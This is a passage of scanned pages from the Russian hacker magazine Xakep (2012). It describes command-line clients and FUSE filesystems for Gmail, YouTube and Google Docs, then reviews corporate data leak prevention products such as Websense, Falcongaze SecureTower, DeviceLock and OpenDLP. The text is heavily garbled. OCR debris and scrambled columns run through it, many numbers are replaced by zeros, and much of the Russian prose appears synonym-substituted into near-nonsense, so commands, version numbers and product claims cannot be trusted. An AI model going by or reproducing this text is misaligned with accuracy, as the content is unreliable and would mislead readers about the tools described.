попросит определить Gооglе-логин [адрес почты

<<Календарь>>, <<Контакты>>

нате

[Gmaill, Google Docs,

превращения веб-сайтов во приложения . До­

$ google youtube post --category \ Comedy yжoc.avi

Конечно же, не дозволяется бросать равно относительно контроль­

ном скрипте

не без; wеЬ- т ехноло г иями приложенийl, только его цвета корма .

0. gтls<iir

браузера. Проект благословенно загнулся

[а есть л да т оч н ее, переро из умереть и безграмотный встать фре йм во что касается р ко к

$ gcp -f pdf \

$

приложений склифосовский коптеть на Сети , а поль­ зователь сможет помещать их для рабочем

"Список покуnок"

Gmaill да откроет страничк у на спринклер ре,

Picasa равно YouTube [только добавка видео!.

получай которой делать нечего п в отношении дтвердить власть

Мы ранее писали об этой утилите во одном изо про­

Goog leCL

шлых номеров, бард ому ваш покорнейший слуга безвыгодный буду возобновляться

следующих запусках сервиса сносно причинять

да прямо-таки приведу до некоторой степени примеров ее ис­

равным образом уверять отнюдь не н у жно.

в удаленное у правление. При по­

-7

Инструменты

-7

Создать

мещения ярлыка [рабочий питание и/или меню приложенийl, и- вуаля!- сверху рабочем столе появится ярлык, по мнению клику в котором

во обособленном окне откроется сайт без ненужных обвесок во виде карточка браузера

да строк ввода/поиска . То но самое, причем даже изо командной строки, дозволяется произвести

пользования.

равным образом от приложениями, установленными от по­

мощью Chгome

Публикация п ос та на благе из через

0.

Bloggeг:

Мы нашли массу приложений , способных

Web Stoгe [по клику правой

кнопкой мыши!:

заслонить никак не век сподручный веб-интерфейс

$ google. b.lagger с c:ti tJ.e 'Я в сЦ :.. 'Oткpt>UJ

рщt --Ьlog

'Linuxoid' \ Googlech l ' .--:tags ' linux, \ ДllЯ . ceбя _Google(:~, . \ .

...... Ы.а. с!:>lа, ..1;11а .: . Добавление действие на календарь:

0.

сер висов. Но что-то неравно к какого-то экзо­

$ chromium --app=http : //gmail.com

тического веб-сайта вновь безграмотный разработано нужного приложения другими словами существующие нам

Достаточно мыслительный управленец

невыгодный приглянулись [как вариант, понравился

окон сохраняет место да размеры окна

банальный веб-интерфейсl ? В этом случае

на пороге закрытием равно восстанавливает его

позволяется взять на вооружение технологию

Desktop web

appl i catioп, которая обеспечивает запускание

в прежнем месте присутствие следующем запуске.

Функция веб-приложения кушать равным образом во браузере Fiгefox. Здесь всё покамест попроще : хватает пере­

> youtube

vieыer

>

lnsert an YouTube Ul!l or search somethi ng .•. linux

0 2 3 4 5

-

Б -

0 В -

0 18 11 12 13 14 15 16 17 18 19 28

-

UberStudent 0/eview - liпux Distro 0/evieloJS lby lnflnitely6alactic ) ( 01 :58) Ubuntu 01 . 08 0/eview- linux Distro 0/evieloJS lby lnfinitelyGalactic) 013 : 02) How То Baclc:up Your Frugal Puppy Using Puppy linux lby icyos ) 083 : 06) Creating а DeЬian AIIM JМG for Archos - linux - Part 0 l by metalx1BBВJ ( 08 :56) linux Mint 02 0/evieы- linux Distro 0/evieloJS lby JnfinitelyGalact i cJ 012:41> linux is Better Тhan llindoloJS lby loclc:ergnome) ! B5:BBJ linux lby llhatYouDughtтoKnow) 084:32) linux Mint 02 0/evieы 0 LA5 0 s19eBB l by jupiterbroadcasting J 055 :49) Js Desktop linux Dead? 0 LAS 0 s19e84 lby jupiterbroadcasting ) 081:18 : 08! linux Opti11ization lby Jockergnome) 085:35) openSUSE 02 . 0 0/evieы 0 Тhе linux Action Sho"'! lby jupiterbroadcasting) (55:52) Pinguy OS 01 . 01! 0/evie"'- linux Oistro 0/evieloJS lby lnfinitelyGalacticJ 018 :44) llindoыs is Better Тhan linux lby loclc:ergnore) 084 :87) Fedora 05 0/evie"'- linux Oistro 0/evieыs l by InfinitelyGalactic) 019:17> Мessages from the linux Cшmunity lby ТhelinuxFoundationJ !85:B3 J linux Mint Cinnai!IOfl Desl<top early lool< Jan 08th 0812 lby linux4UnМe) 087 :56) Тhе Не"' Нui\Ьer One Distro? - linux Mint 02 lby gotЬletuJ 088 :1!3) IIIHOOIIS VISТA AEI/0 VS LIHUX UBUHТU BEI/Yl l by tearbd2J 084 :33 ) An lntro to linux Part 0: llhat is linux? !Тhis lleel< ln linuxJ !Ьу th i sыeelc:inlinux) 083:26) Fedora 06 0/eview- Linux Distro 0/evieыs (Ьу lnfinitelyGalactic) (87:57)

тянуть favicoп сайта возьми действующий стол, равным образом ярлык появится самопроизвольно собой.

Зто в самом деле покойный сноровка созда­ ния веб-приложений нате рабочем столе, да он не лишен некоторых недостатков. В частности, лично меня чрезвычайно напрягает, который использование

хорош делать подина управлением на худой конец да лишен­ ного элементов управления, же полноценного

веб-браузера от плагинами, расширениями и во всех отношениях остальным совершенноненужным

во данном случае балластом, что только лишь сжирает кэш равным образом процессори далеко не слабит

лажовый пользы. Позтому моя персона рекомендовал

бы воспользоваться интересах подобных задач более легкие решения, для примеру минималистичный браузер suгf. Браузер suгf основан бери движке

WebKit,

отнюдь не имеет интерфейса равным образом управляется от помощью клавиатурных комбинаций . Это самый легко­ весный равным образом борзый с всех браузеров, основан­

Youtube-viewer- консольный скрипт чтобы просмотра роликов со YouTube

012

ных в полноценном НТМL-движке, а оттого спирт

ХАКЕР

03/158/2 01 0


Д остуча ть ся д об н ебес

Sup- Мutt-подобный

потребитель интересах

Gmail

без упрека идет в целях запуска приложений.

(наnример , на поисках интересн в рассуждении г касательно видео

Самый бездействие версия его запуска выглядит

в

в такой мере :

(например , ради управления п что касается чт ой ! равно ис­

YouTubel,

порождать да отгонять файлы

пользоват ь р азнообразные пер ен аправления ввода-в ы на по части да. Для тех а серв исо во Гугла

$ surf http:)/gmail.com

существ у е т ч етыре таких вирт уал ьных фай­ ловьlх со равно сте м ы нате основе

во него только лишь узенькую полоску загрузки,

FUSE: Yout ubeFS, GDataFS, Gm aiiFS, Google Docs FS (ес ть еще goofs, однако сие полузаброшен н ая Jаvа­

На экране появится интерфейс

Gmail

во аб­

солютно голом да чистом виде. Браузер добавит

# vi /etc/gmailfs/gmailfs.conf [account] username=usernamegmail.com password=параль [filesystem] linux_fs_4 fsname

которая отобразится на нижней части окна.

изделие l. Та кж е на Сети можн по части н айти f lickгfs ,

Чтобы предложить нужные габариты окна разом

предна з н ач енн у ю на загруз ки изоб ражений

умереть и отнюдь не встать времена запуска, дозволено выехать

бери flickг.co m равно MetaWeЫogFS. С ее по части мощью

у тилитой wmctгl:

можн насчёт п ости ть во блоги из первых рук изо кусок андной

[logs] l evel=INFO logfile=- / gmailfs.log Затем н у жно примонтировать файловую систему:

строки .

Крат ко по отношению пройдемся в области во всех отношениях фа й ловым

#!/Ьin/sh

surf http://gmail.com wmctrl -r surf -е ·e,se,se,4ee,зee· С крипт откроет

Gmail

размер окна равным

во окне suгf, сделает

000 х 000

равно разместит

его на левом верхнем углу, от отступом

00 по левую сторону

равно сверху. С через среды рабочего стола

системам равно попробуем поразобрать со я, для а ко да х

использовать. Итак, Youtube FS !code .goog le. com/p/youtubefs/1 - файловая си ст ема интересах до­ ст у танцевальный шаг ко YouTube. Этой системы блистает своим отсутствием во большин­

$ ./gma ilfs.py

allow_root

поnе

\

/ траектория /до/каталога

Теперь перейдем ко Google Docs FS (code. google .com/p/google-docs-fs/1 . Эта файловая

стве дистриб у тивов, всё же интересах ее у бивак насчёт во ко равно

доктрина предоставляет проход для документам

полно со колебать со сайта тарболл равно распако­

Google Docs.

вать его . Пользоваться так:

в качестве кого равно постоянно прочие ФС на нашем обзоре:

$ ./youtubefs .py \

$ gmount

Использовать ее в такой мере а просто,

скрипт подумаешь обернуть на метка да примостить

возьми рабочем столе .

/ nуть / давно /ка талог а

\

/ маршрут / вплоть до /каталога

П осле сего во указанном каталоге появят­

После сего на катало г е появятся подката­ логи да файлы на в точности таком но виде, во каком

Иногда удобнее безграмотный проэксплуатировать специаль­

ся безвыездно плей-листы равным образом каналы, получи и распишись которые

ные клиенты, а собирать веб-сервисы

ть1 подписан . В каталогах твоя милость найдешь самочки

они представлены получи и распишись сайте

на виде без затей файловой системы, идеже дозволительно

видеозаписи. Аналогичной функционально­

Документы не грех копировать, перемещать,

стью обладает

конкатенировать равно удалять. Для отключения исполь­

тащиться со через файлового менеджера

net l,

GOataFS

( gdatafs . souгcefoгge .

которую допускается сыскать во репазитариях

docs.google.com.

з уем команду gumouпt:

дистрибутивов. Синтаксис ее вызова не­

$ gumount

сколечко иной:

GOOGLEAUTH

$ gdatafs

l:i§l:lei!C!I

\

/путь)до/каталога

/ конец / до самого /к аталога

Веб-сервисы от п особны заместить около

параль

что ни придется настольное приложение. Их отнюдь не нужно Недавно

Google

изменил рецепт

Файловая учение

GmaiiFS

( sг71 . net/

назначать да обновлять. Они позволяют

аутентификации сторонних приложений,

pгojects/gmailfs /1 предназначена пользу кого монти­

безвыгодный беспокои ть ся в рассуждении сохранности данных равно на­

почему для того каждой программы lскрипта),

рования почтового ящика

строек . Однако лично интерфейс веб-сервиса

ет сверху основе протокола

может никак не начаться некоторым пользователям

работающей со аккаунтом

Google, nридется

Gmail. Она работа­ IMAP, оттого прежде

сложить один nа занятие . Для сего заходим

ее использованием придется привнести его

тож предстать очень тяжеловесным alias

получи и распишись страницу

https://www.goog le.com/set-

поддержку на настройках сервиса (Настрой­

назойливым. В этом случае удобнее об­

tings, засим

выбираем оnцию << Авторизация

ки~ Пересылка равным образом

ратиться ко специализированным клиентам

IMAPI.

nараль равно задаем свежий nараль не без; nомощью

конфиг

сnециальной телосложение на конце страницы.

содержания :

03/158/2012

~Включить

После сего делать нечего организовать

nриложений равным образом сайтов ~Изменить», вводим

ХАКЕР

POP/IMAP

/etc/gmailfs/gmailfs.conf

следующего

равным образом файловым системам, которые, что твоя милость смог убеди ть ся, на достаточном количес тв е имеют­ ся получай просторах Сети . :::И:

013


SYN/ACK

Сернуля « gгindeг » Яремчук lgгindeгlё!synack.гul

БОРЬБА С УТЕЧКАМИ КОРПОРАТИВНОЙ ИНФОРМАЦИИ

-

Важныйэтап в развертывании

DLP

-внедрение, когда-никогда

В современном мире одним изо ключевых экономических ресурсов является

информация. Кто ей владеет, оный достаточно вмещать успех, на так но эпоха вытекание данных практически во всякое время означает потерю клиентов, а в таком случае равно фиаско компании . Именно

следственно теперь беспричинно велодрын заинтересованность ко DLР-решениям, позволяющим раскрывать и предотвращать передачу конфиденциальной информации. Выбор большой, лидеры еще отнюдь не сформировались, а предложения неоднократно схожи сообразно функциям, хотя отличаются логикой работы равно заложенными принципами, почему поступить неграмотный что-то около просто.

должен четко сформулировать требования и ожидания

равным образом «Обесnечить »

DLP

-

всеми данными интересах

контроля .

Репозиторий

для того

Ubuntu MyDLP- <tow_n_-

~111.edгatecb .

иm.lц!шn.tu .

ХАКЕР

03/158/2012

.


В поисках равным образом н балка д драчун

КАК ВЫБРАТЬ

DLP?

Информационная защищенность стала одной изо поезд л яющих дея­

тельности все так же какой компании, а соответствующие риски влияют возьми ее рейтинг да заманчивость на инвесторо на . П насчёт ста т истике, во е ­ роя т ность прибыль конфиде н циальной информа ц ии по поводу дейст на ий

сотрудника организации [и н овраг д ера] превы ш ает вероят н восток ь уте ч ­ ки во результате взлома, вдобавок сие никак не обяза т ельно умышленные действия, абонент может по стечению обстоятельств отпра во ить обложка неграмотный тому адресату. Д что касается появления интернета проверять деятельнос т ь

ОШИБКА В РАБОТЕ

DLP

МОЖЕТ

ПРИВЕСТИ К БЛОКИРОВКЕ ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ

сотрудников было по существу невозможно. Н ет, установить контроль, конечно, было реал ь но, да технических средс т во для автоматизации ради ц есса неграмотный су щ ествовало. Сейчас всё изме н илось.

ражения равным образом т. п.]. Хорошие системы, вроде правило, используют однако

Деловая переписка подобает по части электронной почте, пользователи

доступные технологии , а ведущий может несомненно образовывать

общаются путем

распорядок собственными силами получи основе подготовленных шаблонов .

lM

да

VoiP,

обмениваются файлами, ведут

блоги, публикуют сведения на сацсетях да т. д. Все сии каналы

Кроме того, DLР-система должна поставлять службу безопасно­

легко и просто надзирать автоматически, нагрузка современных

сти инструментом для того анализа всех событий да архивом переданной

серверов равным образом резервуар носителей позволяют набирать равным образом обрабаты на ать

информации. Еще одним критерием, определяющим извлечение

документация на реальном времени. Ч тобы обнаружит ь равным образом пре д отврати т ь

является способ закреплять утечку дан н ых во реальном вре­

передачу конфиденциальных данных возьми разных буква п ахти [при пере­ меще нии, использовании равным образом хранении ] , применяется единый характеристический показатель

мени. Однако специалисты разно относятся ко этой функции,

систем защиты-

особенно держи этапе ввода на эко из плуатацию] может ввергнуть ко бло­

DLP [Data Leak

Ргеvепtiоп] . На теперь суще­

тогда ляпсус на работе

DLP,

DLP [а ложные срабатывания случаются,

ствует уже из десяток терминов-синонимов в целях таких сис т ем:

кировке тотально легального трафика, а значит, спутать планы работе со­

[lпfoгmatioп

трудников . Поэтому многие администраторы предпочитают обсуждение

ILDP Leak Detectioп & Pгeveпtion], IPC [lnfoгmation Pгotection and Contгol], ILP [lпfoгmatioп Leak Ргеvепtiоп] равно др . Задача у них,

согласно факту, а невыгодный блокировку.

на общем-то, простая - мониторинг, да д ентификация равно оборона .

Официальных стандартов, по отношению п ре д еляющих, экий д олжна составлять

DLP,

WEBSENSE DATA SECURITY SUITE

доколь невыгодный существует, благодаря тому разработчики nо-разному смо т рят

Са й т проекта :

для функции

Лицензия:проприетарная .

DLP.

Часто дозволено столкнуться самые отличаются как небо и земля реали­

websense.com .

зации, далеко не во всякое время включающие подлинно необходимое или,

ОС не без; ервер :

наоборот, напичканные ненужным функционалом, добавлен н ым

ОС клиенты: Windows Vista , 0, 0003, 0008/R2.

объединение заказу компании. Однако со временем определились некотор ы е

Русифи для ация: отсутствует.

требования, которыми следует не быть обделенным полнофункциональное

Windows Server 0003 R2 .

Калифорнийская организация

Websense

хоть куда известна равно как

DLР-решение. В первую черед они касаются д иапазона возмож­

изготовщик систем филырации веб-трафика, на частности,

ных каналов утечки:

на

электронная связь

[SMTP, РОРЗ, IMAP];

Facebook

через малое время короче внедрена ее исполнение чтобы защиты подле

переходе в области внешним ссылкам. Решения ориентированы во первую

программы обмена IМ/Vо iР -сообщениями да Р2Р-клиенты; веб-ресурсы [социаль н ые се т и, форумы, бло г и], а вдобавок пере ­

колонна для сре д ние равным образом круnные компании со штатом от бога

000

сотрудников равным образом государственные учреждения. Комплекс Webseпse

из-за цифирь контроля основных каналов обмена д анными позволя­

доза файлов по части протоколам НТТ Р, НТТ РS равно FТР ;

DSS

сетевая распечатка [SM В P гinting, NCP Pгintiпg , LPD, равно т. д . ]; внешние устройства [USB, CD/DVD, принтеры, Bluetooth, модемы и т. п . ], сетевые папки .

ет во реальном времени остановить утечку конфиденциальной ин­ формации . Он работает получай основе технологии цифровых отпечатков PгeciseiD, разработанной компанией PoгtAuthority которую

Websense

купила на

0006

году .

PreciseiD

Technologies,

обеспечивает вы­

сокую пунктуальность обнаружения конфиденциальных данных да отнюдь не име­

Характер п ередаваемых верно нн ых определяетс моя персона посредством обнару­

жения специфических признаков [метки, хе ш- фи н кции, грифы ] и анализа контента [статистический анализ, регулярные доставать

ет некоторых недостатков лингвис т ических методов . Д анные опи­ сываются быть помощи « цифрового отпечатка >>, представляющего

~.:._:=~ -~ ~-~-'"'-w ~~.--------,IЬ"',..=.-= ..:::~=·=-·- - - - - - - - - J ....

·-. --

0dl c.-c~

lii $~--

'""'""""!''!IIIIICI!I=a=ВI!!Iii!!IC=---~~==~

~~

.......

___

:IJ"ICO:u'lq~Yypts

---~ __.... • 0 • IG • \2 • 0 • • • '

~-~

'11"~... .._

,) 12 • 0 • • • '

• 0 • 'IO • Il

...... '!~"

__ .._

~~,._

--

к..---

в-

--

--

е

_

-----------

____

~~~-r,.",

.

-

! в.:-

.-

.

01Ь!88!-=- • 0rь.-.

ее

• - Р--а - з.--

Н аст несметное количество ка разреше н равным образом й во

ХАКЕР

03/158/2012

DeviceLock Endpoint DLP Suite

Установл е нны й

DeviceLock DLP не без; лошаденка жит фаланга

го так на ых n рав баткак

015


SYN/ACK

WEBSENSE DSS ОПРЕДЕЛЯЕТ РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ ОТВЕТСТВЕННОГОСОТРУДНИКА

Websense Web 0ecuгity Gatewayl. П оддерживается интегрирование · с Act ive Diгectoгy, Novell eDiгectoгy равным образом Lotus Domino. Совместно с Websense 055 используется цепь других приложений, рас ш иряю­ щих потенциал колтун пл екса DLP: Data Еndроiпt-устанавливается возьми конечные П К, идеже контро ­ лирует данные, передаваемые сквозь U5B равным образом подле печати, попытки сделать скриншоты экрана, сведения lM равно т. д . ; Data Мопitог - осуществляет оценка каналов передачи, · чтобы в отношении п ределить, кто, куда, в духе равно который с пр авляет, да сопостави ть с политиками да бизнес-процессами, снижая риски;

Data Ргоtесt-включает Data Мопitо г, автома т ически блокирует собой подбор символов сиречь слов документа или — или со д ержимо го полей

утечку данных бери основе политик;

БД. Такой по мнению д передвижение обеспечивает точную классификацию контента

Data Discoveг- график про поиска да классификации конфи­

больше нежели в целях 000 форматов давно кументов (включая та блицы СУБ Д

денциальныхданных, которую дозволительно проэксплуатировать равно как во составе

равно сжа твоя милость е файлы ! , правда но разве сведения перенесены другими словами конвертиро­

055, эдак равным образом отдельно, безграмотный требуетустановки агентов.

ваны на иной формат. Кроме PгeciseiD, используются часть алго­ ритмы : словари, точное равно частичное совпадение, статистический

Для управления всеми решениями Websense используется

разложение равно т. д. Вместе из тем чтобы анализа информации во продуктах

единая ферма Websense TRITON Coпsole (Java равным образом Apache Tomcatl.

Websense nрименяется изрядно технологий Deep Content Сопtгоl

Websense 055 куда прямо устано скручивать . В картотека еще входит М5 0QL 5ег v ег Expгess 0008 R2, же к больших сред паче ис п ользовать

равно T hгeat5eekeг (сканирова н ие веб-сайтов да установление новых угроз).

полную версию. Первоначальная установка государственный деятель производит­

П роизводится оценка основ н ых каналов передачи: элек­

тро нн ой почты (5М ТР ), сообще ний М5 Exchange, НТТР/НТТР5, FТР, IM/M5N . П редусмотрена слияние до ICAP из любым да нт ернет­

ся возле помощи не мудрствуя лукаво г что до мастера, создающего шаблоны со учетом страны да харак т бретер деятельности организации, на волюм числе имеют­

ся равно региональные настройки ради России .

шлюзом, поддерживающим сие т п ро т окол. Для мони т оринга сервер

FALCONGAZE SECURETOWER

Websense может наставать во разница либо — либо использовать зеркалирование трафика (5PANI. Websense 055 ав т оматически определяет реакцию в инци­

Лицензия:nроnриетарная.

дент либо требует подтверж д ения ото по отношению тв етственно г в отношении сотрудника.

ОС сервер:

Система умеет запирать передачу конфиденциальных данных,

ОС клиенты:

заниматься сообщение !специалисту службы безопасности,

Русификация: есть.

Сайт nроекта:

начальнику другими словами владельцу контентаl, засовывать внешнюю про­

falconqaze.ru .

Windows 0003/2008lx86/x64). Windows XP/Vista/7/2003/2008lx86/x64).

Относительно молодое решение, разраба тыв аемое россий­

грамму, отправлят ь требование н а п од тв ерж д ение отправки да др.

ским 000 «Фальконгейз>> . П редставляе т с лица программный

Система присваивает ан ц иде нт у у никальны й выпуск равным образом прикрепля­

продукт, использующий для того поиска конфи д енциальной инфор­

ет для сообщению файл. Администратор задает г ибкие политики

мации технологии контентного, а три бутив н ого равным образом ста ти не без; т ическо­

вместе с учетом дельце -проц ессов килоом п ании, а на комплекте поставки ранее

го анализа (ключевые слова, регулярные выражения, микротипия

как не быть порядочно д еся т заговор шаблонов да н астроенных отчетов

равным образом т. д.) . Обеспечивает ревизия всех популярных каналов прибыль

в области инцидентам да активности п ользовате л ей. Продукты Websense

данных, во книга числе что касается т слеживает вслед за ш ифрова нны й затор

отдельных сотрудников либо групп, защищают корпоративную

(НТТР/5, FТР/5, РОРЗ/5, 0МТР/5, IMAP, 05CAR, ММР, M5N, XMPP I Если во организации используется М5 Exchange 0007/2010, так все

документацию ото внесения несанкционированных изменений.

внутренняя да внешняя переписка как и проверяется в соот­

Остальные потенциал включают п ринудительное криптооперация

ветствие политикам. Особо неймется акцентировать полную поддерж­

позволяют секвестировать посещение ко опре д еленным сведениям к

электронной п оч твоя милость (ч ерез шлюз! равно совместную работу со други­

ку 0kype, так-таки 0есuгеТоwег может затягивать голосовой

ми продуктами Websense (напр имер, со шлюзом безопасности

трафик, текстовые сообщения, файлы равно отправляемые 0М5.

ВОЗМОЖНОСТИ

OPENDLP

Проект OpenDLP lc ode.google .com/p/

помощи SSL !используется libcuгl) . Настройку

(nолучать инвентарь файлов, во которых найдены

~1 предлагает сочетание инструментов

большого числа агентов упрощают профил и,

совпадения) да приводить работой агентов

пользу кого nредотвращения возможных утечек

содержащие инструкция сканирования.

!пауза сканированияидеинсталляция

информации со клиентских машин,

В инструкция х чтобы описания объектов поиска

агента) . В текущей версии безвыгодный производится

работающи х почти управлением Windows . Для сего в подчиненных комnах

используются Регl -со вместимые регулярные

проелушивание сетевого трафика, а в свой черед

выражения , позволяющие раскрывать

разбирание информации, копируемой держи неглубокий

устанавливается мелкотравчатый агент.

н что касается мерило кредиток да паспортов ,

Само строительство производится

пароли, вскрывать наличность держи ресурса х

документы во текстовом формате, хранящиеся

на автоматическом режиме от Netblos/SMB .

документов со конфиденциальными данными

держи жестком диске колтун шаг . Проект нонче

Кроме того, к тому идет прямое развертка

равно изучать их обработку сверху внешних

находится на стадии активной разработки .

систем кроме установки агентов во

Windows !через SMB), *niх-системах ISSH) равно СУБД IMS SQL равным образом MySQL). Централизованное отдел

сервисах IGoogle Docs , Gmail) . Администратор

Первая видоизменение лещадь номером

может настроить черноволосый равным образом смерть перечень

на апреле 0010-го, текущая версия-

каталогов с целью сканирования равным образом предложить

Серверная деление написана получи и распишись языке Регl , с целью

осуществляется близ помощи веб - интерфейса,

отслеживаемые расширения файлов .

установки разработчики рекомендуют

продуктообмен данными из агентом производится

В нынешнее сезон интерфейс позволяет

да

в области каналу связи, зашифрованному рядом

просматривать результаты сканирования

016

SSN ,

владелец , проект проверяет токмо

0.1

представлена

0.4.3 .

Apache Linux, в целях х ранения данных используется MySQL. Агент написан получи и распишись языке Си. Исходные

ХАКЕР

03/158/2012


В поисках инсайдера

р

• "--R- м.. - ..,.. _ · -

~~~~~~--------------=~~ lti!Ar. ......

~

• .__w.._........,."...._......,.....,.._..,......,.,.r...,__.._._.._• ._,._w.,_.._.._ ... ___ ....,.

об --

- ·-

.

М! Dq!t!aR "' !:t_. "'D ,em

fQ ~

0Z!SIПa

wш~·

-..-.

_.,_._.......,.., _ _

...-~

rQ ~Scnll

0]iO.J5

_",_.._,

I!Xm!Ncr!SIOWdnмA'ft•l

0tJ ~

$acll

d4J'S

~.,.,._._.,.._,...1....

0[) ~

0о1:С

~

~.,*~,._

~$tp!trdeмi'И1

~==::

~

'4 ~$atlt

WtteqsJEJrtd;IQattr«di!

ro ~

~

r{J ,....... ~

IQ!StqyyD9!\'Ьrdцr+1

--=. . _. "'~

~ '""""*-1

r/J ~

.S0i1t

:::

s.r.

...us

Scr1>l

0835

=::~=-==..:= О.С.. .................. . _

_ . , ....... ......., ..... Н-

031815

_"'._..,. ........... ~ ~., . . . . . - - - - . . . . :к...

~

_ _ ., ............... >d.-

==::

....

r/J ............... ...._ t,Q .......,. --~

t.JI0]5

- < t i - S 0 ........... 0.~

0.J80J5

~--.и--

riJ ~ ....,.е._

dD35

":J ~

~

&.us

~

lt} ........... _ . ,

018)5

_.,s.-.8r~~

~

~~ ~

08И

~"!~~~~

....... -1~---

ИQmAgpiJ!tyrlwм'tJ•ppt

Шаблоны

~"'-'

0IIQ.ta

wн.rurnмt!Qnмtю!aJ

............ .......... """''"' .......

•-

~

АФ!оr•м•и•n

NA«n " F«f·''"A

..""*"•

0cпJrnltetcт....twu-nl,.......'i'nч•

~

:g:::

rD"""""*'"" - . - . . . !/J """"*-1 ._...е.-

гггг ~ · J

~ ~

В по части

____

~-

·-·

~ Sllld . . ........, ................... _~ ........... ..... s

~ --

~ ............ ~.-.......... -

~-- ... .u.a!8

• 01111D

____ .. _..,_

... ",. ..... . , . - . . . ..... ..,.__

~ .... - - - -

...

~ ~ l"'::ler.............. ..._., ~."..

,."

c-.-e::IIO.. " - • ""'--_..., ...........-..

-

..... c.-oм-a: ... ......,JJ L-Qoo81:0'8_.._ . . . . . .

=--........- . . .

-..:..,_ ... ...".а-м-. -----~-t.al

::::::~:::::.=.-.:.

-fii...-И168it_.........._ _ " ,..u...,..._..~ -r~-- IIIIW>•-

.

_.,s...a,~~

гггггг- ,.-

Выбор nолитики во рента

Websense DSS

Не безвыездно DLP сие умеют либо — либо обеспечивают на полном объеме !чащ е ус тановленный уполномоченный контролирует всего лишь текстовые сообщения].

J ...... _ ,..__. ..... a.

Websense Data Security Suite

ния ахти пр ос т , ради управления , создания правил равным образом анализа

испо льз уется консо ль администратора

Falcongaze SecuгeToweг Falcongaze SecuгeToweг

Перехват трафика может фигурировать настроен выборочно: в области IР­

Admiп Coпsole да консо ль безопасности

адресам alias диапазонам, МАС-адресам, п ортам равно протоколам,

Clie nt.

логинам, размеру файлов да т. д. Система распознает защи­

щенные движение роле м документы MS Woгd/Excel, PDF равно отдельный

правил , позволяющих раскрыть отправку ряда данных !номеров кредиток, ИН Н ], наведывание соц из етей, отправку итог для того по­

типы архивов. Когда читатель отправляет индент либо — либо

иска новой работы равным образом др .

В усик тановленной системе по-черному до некоторой степени общих

архив, заслоненный танцевальный шаг рулон ем, симпатия генерирует казус да предо­ ста вляет администратору полную информацию да копию файла.

DEVICELOCK ENDPO INT DLP

SUIТE

SecuгeTo weг контролирует причина , копируемые возьми внешние

Сайт nроекта:

побег тройства , регалии получи локальных равным образом сетевых принтера х. Чтобы

Лиценэия:nроnриетарная .

избежать ошибки подле опре делении отправителя, SecuгeToweг, кроме общепринятой информации, секс уче нной с домена ,

ОС сервер: Windows NT/2000/XP/2003/Vista/2008/7. ОС клиенты: Windows NT/2000/XP/Vista/7.

анализирует постоянно контактные данные, IР-адрес равно ступень его

Русификация: ест~

использования, логин во различных месседжерах да т. п. Дал ее

devicelock.com/ru .

Система

DLP, построенная Oevicelock, которое

сверху основе накануне из таточно известного

режим заводи т переанальные карто чки , от через которых

решения

весь собранная сообщение привязывается ко учетным записям

сту жете пользователей для различным периферийным устройствам.

!возможна объединение вместе с Active Diгe ctoгy ].

Device loc k разрешает/блокирует теледоступ из учетом следующих

Кроме того , SecuгeToweг имеет функции, никак не специфичные чтобы

DLP,

однако чрезвычайно востребованные во большинстве организаций. Та к,

от ее через не возбраняется сличать работу сотрудников- си ­ стема иногда делает скрины удивительно ранов пользу кого плацента ую щ е го

просмотра на х ронологическом поряд ке, относительно т слеживае т внутренние

используется для того контроля до­

параметров: логина, типа, времени суток , формата файлов и т. д . Сейчас сие базисный элеме нт системы

DLP,

пополненный

по части пциональным равно модулями Netwoгklock !анализ данных , пере­ дава емых согласно козни ] равным образом Coпtentlock !собственно, отвечает вслед за ана­ лиз да филырацию данных]. Благодаря новым возможностям научился блоки ровать побег тройства , отслеживая во волюм

да внешние контакты. При этом формируются наглядные интерак­

Deviceloc k

тивные отчеты, до зволяющие на дина мике рассматривать следовать сетевыми

числе да со д ержимое коп ируемы х данных , а неграмотный лишь логин

соб ытиями да активностью отдельных пользователей. На основе со­

п ольз ователя равно накипь стандартные мера . При этом раз­

подсвечник нны х данны х бог быстро спрятать , как времени сотрудни ко

ные политики губы навливаются во зависимости ото того, работает

потра тил в околесина общение, прен ебрегая своими служебными

килоом пьютер во силок либо — либо автономно !оперативный равно автономный режимы]. Система обстоятельно протоколирует совершенно образ действий поль­

обяза нн остями, равным образом когда-никогда сие имело место. Функционально SecuгeToweг состоит с нескольких компонентов:

зова телей равным образом осуществляет выборочное теневое переснятие

се рв ер перехвата трафика- захватывает тенетный затор

данных ради анализа . Она распо з нает побольше

равно пер е безусловно ет его во баз у данны х ради х ранения !наибо лее требова­

равно использует мало-мальски механизмов анализа контента: разведка

тельны й для ресурсам компонент];

согласно ключе ваш брат м словам равным образом шаблонам , во томище числе со поддержкой

00

типов файлов

сервер контроля рабочих станций- используется интересах развер­

регулярных выражений !номера кредиток, адреса, паспортные

тывания агентов получай рабочие руки станции, мониторинга их работы

эмпирика да т. д . ], словари, разыскивание по мнению свойствам файлов да данных

равно сбора информации, п ерех вач енной агентами lв волюм числе шиф ­

!название, размер , движение роль, конферанс да др.]. Благодаря этому DLP

рованного трафика равным образом данны х касательно работе от внешними устройствами];

может выкопать текст, сп рятанный, например, во графических фай ­

сервер обработки информации-выполняетобработку, индекса­ цию да рассмотрение данны х, отыскание , отправкууведомлений, формирова­

лах . Реализованы белые списки !списки устройств равным образом протоколов и временные списки], позволяющие пользователю лишенный чего проблем

ние отчетов равно пр .

п олучи ть перед со туп. Возможна соединение со ме ха низмами шиф­ рования Bitlockeг То

В качестве СУБД может бытийствовать использован Огасlе,

SQLite

MS SQL

Sегvег,

да PostgгeSQL. Система несложно масштабируется, возле

Go, PGP,

ТгuеСгурt равно некоторыми другими .

Таким образом, позволено дозволить писать определенные док уме нты лишь нате защищенные носители . Клиентская доля

необходимости во трал позволительно впредь до бавит ь н овый сервер, отвечаю­

в свой черед контролирует ягодицы обмена , PгintScгeeп , литература докумен­

щий из-за перехват либо обработку данных. Пр оцесс развертыва-

тов равно обнаружи вает работающие кейлоггеры.

ХАКЕР

03/158/2012

017


SYN/ACK

l'{j i..--UO'd-.....

-........ _,..._...,., т о...•• -~-.,....~--·""'-

~ ln.W.""~;ММ'

'\1ooooohold-ro.~,

~ lnoblo !INIМ. .....

n-ohold-fo<r.ь ......

0

_

z

""-·--,...-....., O ln .W..I'I- IM"f~

l11нo•МW-•""'f""' ..... '

l.] ln.W..UII.IUitO~

'"-•l>old-'--...,..• 0

Q ln_ТU.W..,ID,..._

